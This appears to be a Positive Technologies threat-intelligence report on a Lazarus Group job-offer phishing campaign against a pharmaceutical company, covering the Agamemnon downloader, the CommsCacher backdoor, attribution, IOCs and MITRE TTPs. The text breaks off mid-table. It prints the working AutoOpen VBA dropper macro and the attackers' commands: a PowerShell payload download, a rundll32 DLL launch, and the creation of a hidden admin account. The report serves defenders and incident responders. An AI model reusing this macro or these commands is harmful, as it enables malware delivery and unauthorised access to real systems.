{ "id": "3caa9aed-43ce-4c37-8793-a99301c11e54", "created_at": "2026-04-06T00:11:04.695857Z", "updated_at": "2026-04-10T03:38:20.296386Z", "deleted_at": null, "sha1_hash": "2af2d8cb54bdb9d6befda3b634d5c15da281d6c5", "title": "Lazarus Group Recruitment: Threat Hunters vs Head Hunters", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4195667, "plain_text": "Lazarus Group Recruitment: Threat Hunters vs Head Hunters\r\nBy Positive Technologies\r\nPublished: 2024-08-19 · Archived: 2026-04-05 19:05:37 UTC\r\nContents\r\nIntroduction\r\n1. Sequence of events\r\n2. Malicious document\r\n3. Trojan-Downloader Agamemnon\r\n4. Trojan-Backdoor CommsCacher\r\n5. Logs of victims\r\n6. Attribution\r\n7. Conclusions\r\n8. Similar malicious campaign\r\n9. Verdicts of our products\r\n10. MITRE TTPs\r\n11. IOCs\r\nIntroduction\r\nAt the end of September 2020, Positive Technologies Expert Security Center (PT Expert Security Center, PT ESC) was\r\ninvolved in the investigation of an incident in one of the largest pharmaceutical companies. After starting to analyze the\r\ntactics, techniques, and procedures (TTPs) of the attackers, the investigation team found similarities with the Lazarus Group\r\nattacks previously described in detail by cybersecurity experts in the reports Operation: Dream Job and \"Operation (노스 스\r\n타) North Star A Job Offer That's Too Good to be True?\".\r\nThis article describes a previously unknown attack by the APT group, reveals the Lazarus Group's TTPs that allowed\r\nattackers to obtain partial control over a pharmaceutical company's infrastructure in just four days, as well as the tools used\r\nby the attackers for preliminary compromise, network reconnaissance, and gaining persistence in the infrastructure of the\r\ntargeted company.\r\nAt the end of the article, PT ESC provides a list of the group's TTPs and indicators of compromise that can be used by\r\ncybersecurity specialists to identify traces of the group's attacks and search for threats in their infrastructure.\r\n1. Sequence of events\r\nAt the end of September 2020, an employee of the pharmaceutical company received a document named\r\nGD2020090939393903.doc with a job offer (creation date: 2020:09:22 03:08:00). After a short period of time, another\r\nemployee received a document named GD20200909GAB31.doc with a job offer from the same company (creation date:\r\n2020:09:14 07:50:00). By opening the documents from a potential employer, both victims activated malicious macros on\r\ntheir home computers (see the «Malicious document» section).\r\nFigure 1. Malicious document\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 1 of 20\n\nIn one of the cases, a malicious document was received via Telegram. Note that both documents were received by the\r\nvictims over the weekend.\r\nAfter running malicious macros on two compromised computers, reconnaissance was performed (T1016: System Network\r\nConfiguration Discovery) by using system utilities ipconfig.exe, ping.exe, and net.exe. Also the following unknown PE files\r\nwere launched:\r\nC:\\ProgramData\\Applications\\ZCacher.dat ;\r\nC:\\ProgramData\\Applications\\MemoryCompressor.tls-lbn ;\r\nC:\\ProgramData\\Applications\\MemoryCompressor.tls ;\r\nC:\\ProgramData\\Applications\\MemoryCompressor64.exe .\r\nIt was not possible to gain full access to all the files listed above during the incident investigation.\r\nOne of the compromised computers used CommsCacher, a backdoor named ApplicationCacher-f0182c1a4.rb (compilation\r\ndate: 2020-09-14T16:21:41Z), and its configuration file C:\\Users\\*\\AppData\\Local\\.IdentityService\\AccountStore.bak\r\nencrypted with the VEST algorithm, as well as the LNK startup file C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\MSSqlite3Svc.lnk. Notably, the backdoor monitors RDP sessions on the compromised computer\r\nusing WTSEnumerateSessionsW (see the Trojan-Backdoor CommsCacher section).\r\nAccording to the proxy server logs, the compromised computers tried to connect to the address forecareer[.]com:443,\r\nwhich was not detected by antivirus engines as malicious at the time of the attack. According to WHOIS entries, the domain\r\nhad been registered a few days before the attack began.\r\nFigure 2. Domain data from the VirusTotal resource\r\nFigure 3. Domain registrar data\r\nAt the time of the attack, content was published on the domain that copied a page of the official website of General\r\nDynamics Mission Systems, one of the world's largest manufacturers of military and aerospace equipment. The Lazarus\r\nGroup had already used this brand in its attacks. The domain also had a valid SSL certificate.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 2 of 20\n\nFigure 4. SSL certificate parameters\r\nFigure 5. Original page of the General Dynamics Mission Systems website\r\nFigure 6. Forged page\r\nAt the beginning of the working week, both victims connected to the RDG server of one of the organization's branches from\r\nthe compromised personal computers. This allowed attackers to gain access to the company's corporate network.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 3 of 20\n\nOn the same day, the company's RDG server showed traces of illegitimate activity and evidence of malicious reconnaissance\r\non the network for the first time. The compromised accounts, in particular, were used to run system utilities systeminfo.exe,\r\nipconfig.exe, netstat.exe, tasklist.exe, qwinsta.exe, query.exe, quser.exe, net.exe, and ping.exe, as well as\r\nC:\\ProgramData\\Comms\\Cacher.hls-iol (version of the public utility ADFind for Active Directory requests).\r\nLater, CommsCacher with the name C:\\ProgramData\\USOShared\\usomsqlite3.lgs.dat was also installed on the RDG server.\r\nThe attackers also uploaded an unknown PE file with the name C:\\ProgramData\\volitile.dat and launched the DLL library\r\nC:\\ProgramData\\comms\\commspkg.bin (compilation date: 2020-08-22T18:45:25Z), which executes files transfered in the\r\nconfiguration via the command line using CreateProcessW. The library is protected by VMProtect.\r\n \r\npowershell -Command (New-Object Net.WebClient).DownloadFile('http://192.168.129.92:8080/volitile.ico', 'C:\\Pro\r\n \r\ncmd.exe /c cmd.exe /c rundll32.exe c:\\\\programdata\\\\comms\\\\commspkg.bin,Serialize +JHzz8nMxMn+wvv+y/7z+MzCwsjz+MzCwsjPwMS\r\nTwo days later, after entering the corporate network, the attackers gained access to a number of servers, including the\r\ndomain controller, additional RDG server, file server, and Crontab server. On these servers, the attackers also performed\r\nreconnaissance using system utilities and system services with the name usomgmt. The attackers used this name to name\r\ntheir own services on the compromised hosts:\r\ncmd.exe /c cmd.exe /c C:\\ProgramData\\Microsoft\\gpolicy.dat -f C:\\ProgramData\\Microsoft\\gpolicy.out C:\\ProgramData\\Microso\r\ncmd.exe /c cmd.exe /c C:\\ProgramData\\Microsoft\\gpolicy.dat 312 C:\\ProgramData\\Microsoft\\gpolicy.bat\r\ncmd.exe /c cmd.exe /c net user admin$ abcd1234!@#$ /add\r\ncmd.exe /c cmd.exe /c net localgroup administrators admin$ /add\r\ncmd.exe /c cmd.exe /c net localgroup -?-¦-+-+-+-+-?-?-?-¦-?-+-?-? admin$ /add\r\ncmd.exe /c cmd.exe /c net user admin$ /delete \u003e\u003e C:\\ProgramData\\Microsoft\\gpolicy.out\r\nDuring incident investigation, the experts failed to gain access to files C:\\ProgramData\\Microsoft\\gpolicy.dat,\r\nC:\\ProgramData\\Microsoft\\gpolicy.out, C:\\ProgramData\\Microsoft\\gpolicy.bin, and C:\\ProgramData\\Microsoft\\gpolicy.bat.\r\nTampering with creation, deletion, and addition of the user admin$ to the administrator group would later provoke the\r\nsuspicion of the system administrators of the compromised company and serve as the beginning of the incident response.\r\nSimilar actions of attackers with the account admin$ were described in the report \"Greetings from Lazarus.\"\r\nAt the same time, by performing reconnaissance on the computers available, the attackers received new vectors for\r\npenetration into the company's corporate network. So, two days later, after the company's network infrastructure was\r\ncompromised, another employee from another branch received a job offer. On the social network LinkedIn, the victim was\r\ncontacted by a user named Rob Wilson, shortly after which she received an email with a job offer from General Dynamics\r\nUK.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 4 of 20\n\nFigure 7. Example of correspondence with Rob Wilson on Linkedin\r\nhttps://mail.yandex.ru/?uid=*********#message/***************,Message \"***, please add me to your LinkedIn network!\" — Ro\r\nhttps://mail.yandex.ru/?uid==*********#message/***************,Message «Rob sent you a new message» — Rob Wilson via Link\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 5 of 20\n\nFigure 8. Rob Wilson account\r\nAfter studying the information about the job and the company through the Yandex search engine, Wikipedia and the\r\nlegitimate website of General Dynamics UK, the employee continued to correspond with Rob Wilson's account, from whom\r\nthey received links to download malicious documents GD20200909GAB31.doc, PDF20200920KLKA.pdf, and\r\nPDF20200920KLKA.zip from an attacker-controlled job search website clicktocareers[.]com, which was not detected by\r\nantivirus engines as malicious at the time of the attack.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 6 of 20\n\nFigure 8. Domain data from the VirusTotal resource\r\nNote that the victim failed to open the received PDF document the first time, after which the attackers sent her the\r\nInternalPDFViewer.exe software to view PDF files.\r\nhttps://generaldynamics.uk.com/,Home - General Dynamics UK,29.09.2020 13:43,2,https://yandex.ru/search/?lr=16\u0026text=%20Gen\r\nhttps://generaldynamics.uk.com/about/about-us/,About us - General Dynamics UK,29.09.2020 13:44\r\nhttps://generaldynamics.uk.com/work/,Work with us - General Dynamics UK,29.09.2020 13:45\r\nhttps://generaldynamics.uk.com/work/careers/,Careers - General Dynamics UK,29.09.2020 13:45\r\nhttps://generaldynamics.uk.com/work/careers/project-management/,Project management - General Dynamics UK,29.09.2020 13:45\r\nhttps://generaldynamics.uk.com/work/careers/current-vacancies/,Current vacancies - General Dynamics UK,29.09.2020 13:46\r\nThe compromised user also forwarded the malicious email to her colleague. However, the recipient did not open the\r\nmalicious document and did not allow the attackers to expand the attack surface.\r\n \r\nhttps://mail.clicktocareers[.]com/public/jobapplications/jdviewer.php?jd=10931 GD20200909GAB31.doc 29.09.2020\r\nhttps://ru.wikipedia.org/wiki/General_Dynamics,General Dynamics — Википедия,29.09.2020 13:56,1,https://yande\r\nhttps://mail.clicktocareers[.]com/public/jobapplications/jdviewer.php?jd=12314 PDF20200920KLKA.ZIP 29.09.2020\r\nhttps://mail.clicktocareers[.]com/public/jobapplications/jdviewer.php?jd=77234 PDF20200920KLKA.PDF 29.09.2020\r\nhttps://generaldynamics.uk.com/systems/,See what we do - General Dynamics UK,29.09.2020 14:11\r\nhttps://mail.yandex.ru/?uid=*********#message/***************,Письмо «Rob sent you a new message» — Rob Wilso\r\nhttps://mail.yandex.ru/?uid=*********#message/***************,Письмо «Job Proposal at GDLS» — Rob Wilson — Я\r\nhttps://mail.yandex.ru/?uid=*********#message/***************,Письмо «Re: Job Proposal at GDLS» — Rob Wilson\r\n \r\nSensitive information has been replaced with asterisks (*).\r\nOn the compromised computer, the attackers performed reconnaissance using system commands query.exe, quser.exe, and\r\nnetstat.exe and installed a CommsCacher backdoor named CommsCacher.dat, which gains persistence via an LNK file in\r\nthe startup folder. The experts also discovered the evidence of launching the malicious DLL Trojan-Downloader\r\nAgamemnon regid.mdb (compilation date: 2020-09-14T16:21:26Z), which is extracted from a malicious document, then\r\ncollects information from the infected host, sends it to the attackers' server, and in response receives a payload (see the\r\nTrojan-Downloader Agamemnon section). Command execution and network reconnaissance on the computer were carried\r\nout using the public utility SMBMAP designed for scanning SMB services.\r\n2. Malicious document\r\nThe phishing document GD2020090939393903.doc contains a decoy text in the form of a job offer. The text of the\r\ndocument:\r\nSenior Business Manager\r\nJob Location: Washington, DC\r\nEmployment Type: Full Time\r\nClearance Level Must Currently Possess: None\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 7 of 20\n\nClearance Level Must Be Able to Obtain: None\r\nTelecommuting Options: Some Telecommuting Allowed\r\nAnnual Salary: $72k - $120k\r\nJob Description:\r\nGeneral Dynamics Mission Systems (GDMS) engineers a diverse portfolio of high technology solutions, products and services\r\nWith a global team of 13,000+ top professionals, we partner with the best in industry to expand the bounds of innovation i\r\nGiven the nature of our work and who we are, we value trust, honesty, alignment and transparency. We offer highly competit\r\nYou will also enjoy a flexible work environment where contributions are recognized and rewarded. If who we are and what we\r\nResponsibilities:\r\nBachelor's degree in Senior Business Manager or a related specialized area or the equivalent experience is required plus a\r\nThe candidate must have proven experience with the capture management and proposal development processes.\r\nDepartment of Defense TS/SCI security clearance is preferred at time of hire. Candidates must be able to obtain a TS/SCI c\r\nDue to the nature of work performed within our facilities, U.S. citizenship is required.\r\nFor foreign Candidates, they have to related in U.S with family.\r\nQualifications:\r\nAt General Dynamics Mission Systems (GDMS), we deliver systems that provide critical intelligence data to our national lea\r\nAs market leader and technology innovator, we are seeking talented professionals to deliver cutting edge solutions to our\r\nGDMS has an immediate opening for a Senior Manager of Business Development.\r\nThe selected candidate will work to identify and acquire new business ventures for GDMS and its customers.\r\nThe Senior Manager of Business Development will work among a talented and technically accomplished group of colleagues, an\r\nREPRESENTATIVE DUTIES AND TASKS:\r\nThe selected Senior Manager of Business Development:\r\nIdentifies and captures new business opportunities in the international and domestic Signals Intelligence (SIGINT) marketp\r\nEstablishes and maintains frequent Intelligence Community (IC) and Defense customer contacts in the international and dome\r\nCollaborates with customers to develop system Concept of Operations (CONOPS), architectures, and requirements for SIGINT,\r\nDevelops and presents briefing packages of business area capabilities and system offerings to international and domestic c\r\nWorks closely with business area technical and management team to align business area strategy, capabilities, investments,\r\nPerforms competitor analyses and develops teaming relationships as needed;\r\nWorks closely with Export Compliance organization to obtain all export licenses for business pursuits in the international\r\nRequired Skills:\r\nMinimum of five (5) years of project management related experience, with 2 years of experience as a Business Development M\r\nExperience coordinating and overseeing the implementation of security projects.\r\nExperience with MS Project, SharePoint, or other project management tools.\r\nKnowledge of general management and auditing techniques for identifying problems, gathering and analyzing pertinent inform\r\nExcellent oral and written communication skills. Interaction and information gathering with coworkers and customers.\r\nEducation / Certifications:\r\nMaster's degree from an accredited higher education institution and a minimum of 11 years of progressive Business Developm\r\nOne industry-recognized business development management certification.\r\nCertifications relating to Government Clearance (a plus)\r\nWe are GDMS. The people supporting some of the most complex government, defense, and intelligence projects across the coun\r\n \r\nSome modifications of malicious documents obtained during the investigation were protected with the password JD-20BZ@9918261231C3 (presumably, to bypass security measures). Document metadata:\r\nFile Size : 1991 kB\r\nFile Permissions : rwxrwx---\r\nFile Type : DOC\r\nFile Type Extension : doc\r\nMIME Type : application/msword\r\nTitle :\r\nSubject :\r\nAuthor : User\r\nKeywords :\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 8 of 20\n\nComments :\r\nTemplate : Normal\r\nLast Modified By : Admin\r\nRevision Number : 2\r\nSoftware : Microsoft Office Word\r\nTotal Edit Time : 2.0 minutes\r\nCreate Date : 2020:09:22 03:08:00\r\nModify Date : 2020:09:22 03:08:00\r\nPages : 4\r\nWords : 870\r\nCharacters : 4960\r\nSecurity : Password protected\r\nCode Page : Windows Latin 1 (Western European)\r\nCompany :\r\nLines : 41\r\nParagraphs : 11\r\nChar Count With Spaces : 5819\r\nApp Version : 15.0000\r\nScale Crop : No\r\nLinks Up To Date : No\r\nShared Doc : No\r\nHyperlinks Changed : No\r\nTitle Of Parts :\r\nHeading Pairs : Title, 1\r\nComp Obj User Type Len : 32\r\nComp Obj User Type : Microsoft Word 97-2003 Document\r\nAnalysis of the document showed that GD2020090939393903.doc contains a malicious VBA macro and a payload encoded\r\nusing Base64 and XOR algorithms:\r\nFigure 10. The structure of the document GD2020090939393903.doc\r\nAttribute VB_Name = \"NewMacros\"\r\nPrivate Function Base64Decode(base64 As String) As Variant\r\n Dim xmlDoc As Object\r\n Dim xmlNode As Object\r\n Set xmlDoc = CreateObject(\"MSXML2.DOMDocument\")\r\n Set xmlNode = xmlDoc.createElement(\"b64\")\r\n xmlNode.dataType = \"bin.base64\"\r\n xmlNode.Text = base64\r\n Base64Decode = xmlNode.nodeTypedValue\r\nEnd Function\r\nPrivate Function GetStringData(data As String) As String\r\n Dim decData As Variant\r\n Dim nLen As Long\r\n Dim strPath As String\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 9 of 20\n\ndecData = Base64Decode(data)\r\n nLen = UBound(decData) - LBound(decData) + 1\r\n strPath = \"\"\r\n For inx = 0 To nLen - 1\r\n strPath = strPath \u0026 Chr((decData(inx) Xor 37) + 134 - 256)\r\n Next inx\r\n GetStringData = strPath\r\nEnd Function\r\nPrivate Function GetBufferData(data As String) As Variant\r\n Dim decData As Variant\r\n Dim nLen As Long\r\n decData = Base64Decode(data)\r\n nLen = UBound(decData) - LBound(decData) + 1\r\n For inx = 0 To nLen - 1\r\n If ((decData(inx) Xor 214) + 55) \u003e 255 Then\r\n decData(inx) = (decData(inx) Xor 214) + 55 - 256\r\n Else\r\n decData(inx) = (decData(inx) Xor 214) + 55\r\n End If\r\n Next inx\r\n GetBufferData = decData\r\nEnd Function\r\nSub AutoOpen()\r\n'\r\n' AutoOpen Macro\r\n'\r\n'\r\nDim strPath As String\r\nDim strArgment As String\r\nDim DataBuffer As Variant\r\nDim PBuffer() As Byte\r\nDim strObject As String\r\nIf ActiveDocument.Shapes.Count \u003c 1 Then Exit Sub\r\nstrPath = GetStringData(ActiveDocument.Shapes(\"Text Box 3\").TextFrame.TextRange.Text)\r\nstrArgment = GetStringData(ActiveDocument.Shapes(\"Text Box 4\").TextFrame.TextRange.Text)\r\nDataBuffer = GetBufferData(ActiveDocument.Shapes(\"Text Box 5\").TextFrame.TextRange.Text)\r\nnLen = UBound(DataBuffer) - LBound(DataBuffer) + 1\r\nstrObject = GetStringData(ActiveDocument.Shapes(\"Text Box 6\").TextFrame.TextRange.Text)\r\n ReDim PBuffer(nLen)\r\n For inx = 0 To nLen - 1\r\n PBuffer(inx) = DataBuffer(inx)\r\n Next inx\r\n Open strPath For Binary Lock Write As #1\r\n Put #1, 1, PBuffer\r\n Close #1\r\n ActiveDocument.Shapes(\"Text Box 2\").Select\r\n Selection.ShapeRange.TextFrame.TextRange.Select\r\n Selection.Collapse\r\n Selection.WholeStory\r\n Selection.Copy\r\n Selection.ShapeRange.Select\r\n Selection.MoveUp Unit:=wdScreen, Count:=1\r\n Selection.WholeStory\r\n Selection.Delete Unit:=wdCharacter, Count:=1\r\n Selection.PasteAndFormat (wdFormatOriginalFormatting)\r\n ActiveDocument.Save\r\n Set objShell = CreateObject(strObject)\r\n objShell.Run strArgment, 0, False\r\n Set objShell = Nothing\r\nEnd Sub\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 10 of 20\n\nLater, during threat hunting, the experts found similar documents:\r\nName Hash\r\nGDLS202009069871.pdf e13888eed2466efaae729f16fc8e348fbabea8d7acd6db4e062f6c0930128f8f\r\nGDLS_2020090392828334.doc 9c906c2f3bfb24883a8784a92515e6337e1767314816d5d9738f9ec182beaf44\r\nGDLS202009069871.doc 75bf8feeac2b5b1690feab45155a6b97419d6d1b0d36083daccb061dc5dbdea8\r\nExamples of decoy documents:\r\nFigure 11. Example of a stub\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 11 of 20\n\nFigure 12. Example of a stub\r\n3. Trojan-Downloader Agamemnon\r\nIf successful, the malicious macro extracts the decrypted data to the file 963e8cfaa40226ba2e5d516464572446 in the\r\ndirectory C:\\ProgramData\\regid.mdb and runs the library with the following parameters:\r\n \r\nrundll32.exe C:\\ProgramData\\regid.mdb,sqlite3_create_functionex X4BJOPK3O6nxwkVuK3HqqTt4 LRTB /QV3AcjAeAb/x3xH\r\nAgamemnon is a legitimate SQLite DLL library with the malicious exported function sqlite3_create_functionex. This\r\nmodification as well as the method of gaining persistence on a compromised computer in the startup folder were described\r\nin the report Operation (노스 스타) North Star A Job Offer That's Too Good to be True.\r\nWhen launched, the extracted file regid.mdb collects the following information about the system:\r\nComputer name;\r\nInformation about network adapters;\r\nUser name;\r\nList of running processes.\r\nNext, the malware compresses the received data using the LZ algorithm with the maximum compression ratio, after which it\r\nencrypts the data with its own algorithm and encodes it in Base64. The malware also generates a unique identifier for the\r\ninfected host.\r\nThe collected information is sent to one of the attackers' C2 servers along with the computer ID. The full list of C2 servers is\r\ntransmitted in encrypted form via the command line. The file GD2020090939393903.doc transmits the following list of C2\r\nservers:\r\nhttps://propro[.]jp/wp-content/documents/docsmgmt.php\r\nhttp://www.ctevt.org[.]np/ctevt/public/frontend/review.php\r\nhttp://gbflatinamerica[.]com/file/filelist.php\r\nhttp://www.apars-surgery[.]org/bbs/bbs_files/board_blog/write.php\r\nhttp://goldllama4.sakura.ne[.]jp/waterdo/wp/wp-content/plugins/view.php\r\nhttps://bootcamp-coders.cnm[.]edu/~dmcdonald21/emoji-review/storage/app/humor.php\r\nAfter sending the data to the C2 server, the malware receives a response from it. It contains the main payload also encrypted\r\nwith its own algorithm. It is either executed in the process memory or uploaded to the hard disk at:\r\n%localappdata%\\~DMF[0-9]{4}.tmp (the path is given in RegExp format) and launched using rundll32.exe. The version of\r\npayload execution is determined by the response of the C2 server.\r\nNote that the loader is successfully detected in the public sandbox ANY.RUN.\r\nFigure 13. Information about network detection\r\n4. Trojan-Backdoor CommsCacher\r\nCommsCacher is also a legitimate SQLite DLL library with the malicious exported function sqlite3_create_functionex.\r\nExamples of LNK files with CommsCacher autorun parameters are shown below.\r\nrundll32.exe CommsCacher.dat,sqlite3_create_functionex dbmanagementservice19253\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 12 of 20\n\nrundll32.exe ApplicationCacher-f0182c1a4.rbs,sqlite3_create_functionex sqlite3msdbmgmtsvc-f810a\r\nCommsCacher downloads and uploads configuration data to the hard disk in the file:\r\n%localappdata%\\.IdentityService\\AccountStore.bak. The configuration file is encrypted with the VEST encryption\r\nalgorithm and contains a list of C2 servers. Example of the configuration data:\r\nhttps://akramportal[.]org/delv/public/voice/voice.php\r\nhttps://vega.mh-tec[.]jp/.well-known/gallery/siteview.php\r\nhttps://www.hospitality-partners[.]co.jp/works/performance/consumer.php\r\nhttps://inovecommerce[.]com.br/public/pdf/view.php\r\nConnecting to one of the C2 servers, the sample receives shellcode and configuration data in response from the C2. The\r\nreceived data is decrypted and the shellcode with the transmitted parameters is launched. After that, the CommsCacher\r\nmalware opens a named pipe \\\\.\\pipe\\fb4d1181bb09b484d058768598b, which is used to receive data from the shellcode\r\nand then transmit it to the C2 server.\r\nThe detected samples C:\\ProgramData\\Applications\\ApplicationCacher-f0182c1a4.rbs (compilation date: 2020-09-\r\n24T05:12:24Z) and C:\\ProgramData\\USOShared\\usomsqlite3.lgs.dat (compilation date: 2020-09-29T03:34:06Z) are similar\r\nto CommsCacher. The files contain 64 MB of random repeating characters. They could be used by the attackers to bypass\r\nantivirus protection that can ignore large files.\r\nThe backdoor functions and its server side were described in detail in the article Operation North Star: Behind The Scenes.\r\n5. Logs of victims\r\nDuring the incident investigation, a number of malicious C2 servers were identified, and, after studying them, the experts\r\nmanaged to obtain log files with the IP addresses of victims also compromised by this group. Log format: [JD = ID][Date]\r\n[Victim IP] [User-Agent].\r\nAll identified victims were notified of the incidents. Sensitive information has been replaced with asterisks (*).\r\nFigure 14. Structure of open folders\r\nFigure 15. Example of lines from a victim log\r\nThe attacker-controlled servers contained files named sclient+[md5 victim]+.tmp or pagefile+[md5 victim]+.dat. These files\r\ncontained information from compromised computers.\r\n6. Attribution\r\nThe detected indicators of compromise belong to Lazarus Group, a hacker group also known as Hidden Cobra. The group\r\nhas been operating since 2009 at least. Lazarus is thought to belong to a class of government-sponsored APT groups and\r\ncome from North Korea. The group regularly conducts its attacks for the purpose of cyberespionage.\r\nThe main source vector of attacks is targeted phishing through third-party resources (Phishing: Spearphishing via Service).\r\nIn this campaign, attackers, under the guise of the HR service of General Dynamics Mission Systems, sent documents with\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 13 of 20\n\nmalicious macros containing a stub text with a job offer through LinkedIn, Telegram, WhatsApp, and corporate email.\r\nBelow is an example of correspondence between one of the victims and an attacker in the Telegram messenger. In this case,\r\nthe attacker offered the victim to do a test assignment on the attacker-controlled server.\r\nFigure 16. Example of correspondence with the attacker\r\nTo attack the organization, the attackers created a phishing site of General Dynamics Mission Systems. As C2 servers, they\r\nused the resources of allegedly compromised organizations located in Brazil, France, Japan, South Korea, and the United\r\nStates.\r\nFigure 17. Original and fake version of the GDMS website\r\nThe group is characterized by the use of unique malicious software for remote command execution:\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 14 of 20\n\nThe detected backdoor CommsCacher indicates a connection with the malicious company Dream Job and identifies\r\nthe group of attackers as the Lazarus Group.\r\nThe document GD2020090939393903.doc obtained during the investigation contains a malicious macro, an\r\nencrypted payload, and startup parameters that are stored in Text Box shapes, which coincides with the description of\r\nmalicious documents that were described in the McAfee report.\r\nThe malicious campaign was also reported by researchers from IssueMakersLab:\r\nFigure 18. Chronology of attacks\r\n7. Conclusions\r\nTo identify all compromised hosts and obtain detailed information about the incident, the experts scanned the entire\r\ncompany's infrastructure for indicators of compromise, as well as network and file signatures of users. All possible host\r\nartifacts were also analyzed. The most useful artifacts for restoring the incident chronology were the USN Journal, EVTX\r\nEvents, Jump Lists, and the MFT table.\r\nThis article describes the TTPs of the Lazarus Group, which allowed them to gain partial control over the infrastructure of\r\nthe compromised company within four days. This shows a high degree of preparedness of attackers and an individual\r\napproach to compromising each host on the infrastructure. The attackers used both publicly available software and tools of\r\ntheir own design.\r\nAccording to the investigation, the attackers did not gain access to sensitive information. As a result of the prompt actions of\r\nPT ESC specialists and administrators of the pharmaceutical company, the attackers were deprived of access to the\r\ncontrolled infrastructure.\r\nAuthor: Aleksandr Grigorian, Positive Technologies\r\nThe article's author thanks the incident response and threat intelligence teams PT Expert Security Center for their help in\r\ndrafting the story.\r\n8. Similar malicious campaign\r\nAfter investigating the incident, we continued to track the Lazarus Group and identified a new attack that has no direct\r\nconnection to the case in question, but affects a similar geographical segment.\r\nDuring this attack, in November 2020, attackers used a malicious document (GDLS47129481.docx\r\n994c02f8c721254a959ed9bc823ab94b) with CVE-2017-0199. The attack was allegedly aimed at a company from Russia.\r\nThe attack was also reported on the Anonymous Security Agency's Twitter account.\r\nThe document contained the following stub:\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 15 of 20\n\nFigure 19. Example of the phishing document\r\nC2 server:\r\nhttps://www.forecareer[.]com/gdcareer/officetemplate-20nab.asp?iqxml=480012756ad26f72e412db0ae7aa183e\r\nThe attackers used the domain from the previous campaign; however, the visual component of the phishing site was\r\nchanged.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 16 of 20\n\nFigure 20. Forged page\r\n9. Verdicts of our products\r\nPT Sandbox\r\nBackdoor.Win32.Regid.a\r\nBackdoor.Win64.CommsCacher.a\r\nTrojan.Win32.Generic.a\r\nPT Network Attack Discovery\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 17 of 20\n\nLOADER [PTsecurity] Agamemnon\r\nsid: 10006234;10006237;10006238;\r\n10. MITRE TTPs\r\nID Name Description\r\nInitial Access\r\nT1566.003\r\nPhishing: Spearphishing via\r\nService\r\nThe Lazarus Group uses malicious job ads sent via LinkedIn\r\nExecution\r\nT1047\r\nWindows Management\r\nInstrumentation\r\nThe Lazarus Group uses wmic.exe to run commands\r\nT1106 Native API\r\nThe Lazarus Group uses CreateProcessW to run malware and\r\nWTSEnumerateSessionsW to monitor RDP sessions\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows Command\r\nShell\r\nThe Lazarus Group uses the Windows command line to run\r\ncommands\r\nPersistence\r\nT1543.003\r\nCreate or Modify System Process:\r\nWindows Service\r\nTo gain persistence on a host, the Lazarus Group creates services\r\nusing the sc.exe utility\r\nT1136 Create Account The Lazarus Group creates local administrator accounts\r\nT1547.009\r\nBoot or Logon Autostart Execution:\r\nShortcut Modification\r\nTo gain persistence on a host, the Lazarus Group places a shortcut\r\nin the startup folder\r\nDefense Evasion\r\nT1027 Obfuscated Files or Information\r\nThe configuration file AccountStore.bak is encrypted with the\r\nVEST algorithm\r\nT1564.001\r\nHide Artifacts: Hidden Files and\r\nDirectories\r\nThe Lazarus Group stores its malware in hidden folders at\r\nC:\\ProgramData\r\nT1070.004\r\nIndicator Removal on Host: File\r\nDeletion\r\nThe Lazarus Group removes malware samples from the file\r\nsystem\r\nT1218.011\r\nSigned Binary Proxy Execution:\r\nRundll32\r\nA malicious DLL is launched via rundll32.exe with an indication\r\nof the exported function and with startup parameters\r\nDiscovery\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 18 of 20\n\nID Name Description\r\nT1087.001 Account Discovery: Local Account\r\nThe Lazarus Group collects information about users using the net\r\nuser and net group commands\r\nT1069.002\r\nPermission Groups Discovery:\r\nDomain Groups\r\nThe Lazarus Group uses the adfind utility to retrieve information\r\nfrom Active Directory\r\nT1016\r\nSystem Network Configuration\r\nDiscovery\r\nThe Lazarus Group collects information about the network\r\nsettings of the infected computer\r\nT1135 Network Share Discovery\r\nThe Lazarus Group uses the SMBMap utility to discover shared\r\nfolders within the network\r\nT1012 Query Registry\r\nThe Lazarus Group uses the reg.exe utility to get information\r\nfrom the registry\r\nT1033 System Owner/User Discovery\r\nThe Lazarus Group collects information about users of a\r\ncompromised computer\r\nT1057 Process Discovery\r\nThe Lazarus Group uses the tasklist.exe utility to get information\r\nabout processes\r\nT1082 System Information Discovery\r\nThe Lazarus Group uses the systeminfo.exe utility to get\r\ninformation about the system\r\nLateral Movement\r\nT1021.002\r\nRemote Services: SMB/Windows\r\nAdmin 